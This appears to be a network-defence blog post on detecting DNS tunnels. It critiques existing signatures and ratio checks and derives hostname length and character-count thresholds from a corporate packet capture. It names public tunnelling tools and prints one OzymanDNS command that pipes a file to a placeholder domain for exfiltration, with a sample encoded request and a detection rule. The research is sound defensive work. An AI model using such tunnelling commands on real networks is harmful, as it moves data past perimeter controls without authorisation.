“I assume you all know the benefits of using a bastion host and filtering all other hosts out so people don’t tunnel data in UDP packets. Well, it’s not enough anymore.”
Oskar Pearson, 1998 on Bugtraq
That was ten years ago. Since then:
- Frodo & Sky, NSTX “Name Server Transport”, 2000: [docs] [earliest ref]
- Kaminsky, BlackHat 2004 on DNS tunnelling. [ppt slides] [source]
- Split DNS: Consistently referenced as the best practice for enterprise DNS deployment.
- Google for help finding DNS tunnels – Hit two: Software which has functionality to detect this is unfortunately in scarce supply. [ref]
The frustrating world of an enterprise network administrator
You have configured your network with split DNS. You have implemented “block all, allow by exception” at the firewall and have documented every exception. You use an authenticated web proxy and require authentication for each new HTTP session. Yet with no prior knowledge of your network and little complexity, an attacker can still tunnel arbitrary traffic through your perimeter when he gains execution. (And we know arbitrary code execution is inevitable.)
Even with awesome funding and a rockstar team, there is little you can do short of blocking all external DNS for internal hosts. Neither industry nor academia has shipped the right tools to detect DNS protocol abuses. The only two reasonable recommendations are static signatures to detect public tunnel implementations or traffic analysis with Sguil to detectunusual transfer rates.
Analysis of Current Recommendations
Static signatures are necessary but insufficient. At the static signatures link above, the first recommended signature alerts on 20 TXT records requests within 60 seconds. The second recommended signature alerts on the unique value NSTX puts in the DNS header. Unfortunately, DNS tunnels do not have to use TXT records – and if they do use TXT records, they are certainly not required to make 20 TXT requests within 60 seconds. (with the implementations below, 19 requests/second would get about 2kBytes/second exfil and 9.5kBytes/second infil) Finally, they don’t have to include NSTX’s hardcoded value. Static signatures highlight gross offenses, but do not assume they make your network secure.
The Sguil analysis is better than static signatures, but is easily circumvented. Bianco looks for “lopsided transfers,” when the gross transfer rate (src_bytes / dst_bytes) is greater than a hardcoded ratio (2x, in his case) and the client-server pair has transferred at least 50k bytes in the previous 24 hours. While the methodology does not limit analysis to TXT records, there are still problems:
- It only examines a single client-server IP pair. DNS’s intrinsic redundancy/forwarding/recursion make IPs less important. Regardless of where your IDS sits in the network hierarchy, two consecutive requests from the same client to the same domain name may not have the same source & destination IPs.
- The ratio is crucial to detection. As Bianco notes, he looks only for DNS infil or DNS exfil. If the amount of data transferred is roughly balanced between client and server, the ratio won’t break the threshold. (i.e., if the attacker downloads 10 MB, he needs to upload between 5 and 20 MB to keep the ratio below the threshold)
- The ratio is too simple a measure for small transfers, so Bianco needed a safety net: only client-server pairs with at least 50k transferred in the previous 24 hours.
It’s less brittle than a signature, but it still requires static thresholds. Like the snort signatures, anything below the threshold is off your radar.
One final consideration:
Joanna was talking about rootkit detection, but the idea is the same.
DNS tunnels in practice
DNS revolves around reliability and forwarding. If a DNS server cannot answer a question, it asks the authoritative server. When an attacker controls both the client asking the question and the server providing the response he can transfer arbitrary data, but only within the bounds of the protocol specification.
As Bianco noted, DNS tunnel traffic can flow in three ways: data infil only, data exfil only, or full two-way communication. The DNS server cannot initiate communication, it can only respond to requests from the client. The response from a DNS server can be any one of a dozen different types (A, CNAME, TXT, MX, etc) and each of these is formatted differently. But for all the diversity in the server’s response format, each response must correspond to a request and the requests can only be one format: a hostname and the desired record type.
From RFC 1035, hostnames must meet the folllowing criteria:
- Allowed characters a-z, 0-9 and – (dash); this means a total of 26 + 10 + 1 or 37 characters
- Labels (between the .’s) of 63 characters or less
- Total size 255 characters (including ‘.’ label delimiters) or fewer
Data exfil and full comms require the client to encode outbound data in questions. We can identify those abuses by analyzing only outbound hostname requests. This simplifies analysis significantly and leaves the uninspected space at data infil only. While data infil over DNS has potential benefits for an attacker, (refer to Blackhat 2008 talk on DNS Shellcode [pdf slides]) the danger relative to data exfil or two-way communications is significantly reduced.
Real-world DNS hostname request analysis
The folllowing analysis was completed on a packet capture from a small-ish corporate network perimeter with split DNS and 100s of hosts. In total, about 97,000 outbound DNS requests over an hour.
Based on the rationale above, I selected 3 characteristics of the hostname requests to analyze.
- Length of hostname
- Count of unique characters (suspecting base32’d text has a higher count than “normal” text)
- Request type (Allows 1-255; dozens of defined types, about ten ‘typical’ types)
The chart above shows the distribution of hostname lengths for all 97,000 recorded requests. The x-axis only extends to 76, because that was the absolute maximum recorded value, despite the DNS RFC’s maximum of 255. The spike between 31 and 39 results from traffic from the internal SMTP server: for every SMTP session it uses the SORBS real-time blackhole list. Each connection causes a request such as:
The height of the spike is relative to the number of connections to the mail server during the capture; the width is due to IP address length variations.
The spike clustered around 26 are outgoing reverse lookups, of the format:
Again, the width of the spike is related to IP length variability.
The final spike around 25 is from 5,000 myspace.com A record requests of the form:
During the capture, one or more hosts queried nearly every record from myspace-000 to myspace-999 and each request was sent to four nameservers. I do not have an explanation for this anomaly; perhaps it’s a bug in some two-bit multimedia app streaming videos from Limelight Networks.
If we break out the RBL and reverse lookups, the resulting chart of hostname lengths is more reasonable. Removing the 3 known oddities, hostname request lengths are roughly normally distributed around 18 characters.
The next chart is the count of characters per hostname request. Any request exfil’ing arbitrary data must encode it into the 37 characters allowed by DNS. Any encoding method will increase the entropy of a hostname request over normal lookups, unless the attacker sacrifices his encoding efficiency and thus his bandwidth. The absolute maximum value recorded was 29, but counts taper off dramatically in the low 20s. The spike around 19 is also due to the SORBS RBL requests.
Internationalized Domain Names, the scheme to support unicode DNS names, will increase the character count and average lengths. Relative to DNS tunnel implementations, the differences are minor.
- Length: overall average: 28.0 std dev: 7.9
- Character: overall average: 15.6 std dev: 3.6
Without the 3 oddities, lengths and character counts are roughly normally distributed. Statisticians will tell you to ignore the oddities and roll, quoting the Central Limit Theorem and Chebyshev’s Inequality as support. With those considerations, we calculate the following upper thresholds:
- Length: 99.75% less than 28 + 3(7.9) = 52 characters
- Character count: 99.75% less than 15.6 + 3(3.6) = 27 characters
Real-world analysis of DNS tunnel traffic
The real question: how do the thresholds compare to the available DNS tunnels? There are only three publicly-available DNS tunnel implementations: NSTX, OzymanDNS and dns2tcp. (I can’t find source for Pearson’s implementation. If you can put your hands on it, mail me.)
Kaminsky’s Ozyman implementation uses hostname requests for the outbound, and TXT records on the return. The format of the outbound requests is:
- data – base32’d data, up to 110 bytes before encoding, 176 after encoding.
- nonce – a safety check for DNS servers that do not respect TTLs
- checksum – checksum of the data blob; actually ununsed. Always zero.
- sessid – a session id for the server to keep track of clients.
To transfer the Ozyman DNS source tarball to the server at domain.com:
guy$ cat ozymandns_src_0.1.tar.gz | ./droute.pl domain.com
Yields a request similar to:
mfzwwyjoobwaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa. aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa. aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaytambxgayaambq. 59534-0.id-40145.up.domain.com.
Char count: 27
176 bytes of base32 encoded data in the first three labels, 17 bytes of housekeeping, a 9 byte domain name and 7 label separators. This is a simplified description of his transport, but you get the idea.
NSTX uses the same techniques. A review of the source details 3×63 byte labels max on hostname requests and TXT records on the return . Hostname lengths will be greater than 189 bytes under full load. NSTX uses a case-sensitive encoding, if the character count is case sensitive, they will greatly surpass DNS’s 37 case-insensitive character max.
UPDATE: A reader brought my attention to dns2tcp, a third public DNS tunnel implementation by the (awesome) hsc.fr guys. dns2tcp also uses base64, so character counts will be huge if your character counts are case-sensitive. Hostname requests lengths are about 190 under full load, with TXT records on the return.
The two public DNS tunnel implementations destroy the length and character count thresholds. Even simpler than Bianco’s src_bytes / dst_bytes ratio, analyzing only hostname requests is enough to detect NSTX and Ozyman DNS tunnel implementations. While false positives will appear, visual inspection will immediately recognize encoded data. The thresholds could be improved even further by a high-level categorization of request type. In this case, we could have created 3 thresholds:
- Requests to the SORBS RBL
- Requests for reverse lookups
- All other requests
“All other requests” has significantly lower thresholds than the combination of all three categories.
Alternatively, thresholds could be set arbitrarily high. It is obscured by the volume, but there are hundreds of requests with lengths greater than 52 characters. The false positive rate will be too high for many organizations. There were no requests with length greater than 76 characters, but both DNS tunnel implementations have significantly higher request lengths. A “sanity check” length threshold around 75 would provide some peace of mind.
The largest problem with outgoing hostname analysis is the toolchain. The analysis requires an IDS parsing application-level data. Some commercial IDSes parse application-level traffic and have alerts in place, but none of the IDSes I’m familiar with abstract it into a generic application-level signature engine. A commercial vendor with an application-level-aware IDS could wrap request analysis into a built-in signature, but the thresholds will vary for each organization. The arbitrary threshold a vendor configures will be the lowest common denominator of all organizations. I want the ability to write a signature such as:
length(dns.request.hostname) > 52 and (not "sorbs" in dns.request.hostname) and (not "in-addr.arpa" in dns.request.hostname)
..and apply it to all DNS traffic, then tweak the logic as I more deeply understand my perimeter’s traffic. Alas, all I usually get is a clumsy web GUI and a few checkboxes.
Vendors: make your products flexible and smarter than your average customer. Those with the desire and capability will pay whatever you ask.
Colleagues: how universal are these thresholds? I have code to parse pcaps and output these statistics. Email me and I’ll send them to you. Send me your statistics and I’ll post them all in a single place. Post it on your own blog and I’ll link to it.
It is ironic I start this post ranting against static thresholds and then end it by suggesting one. Stay tuned; I have an answer to this disparity in development!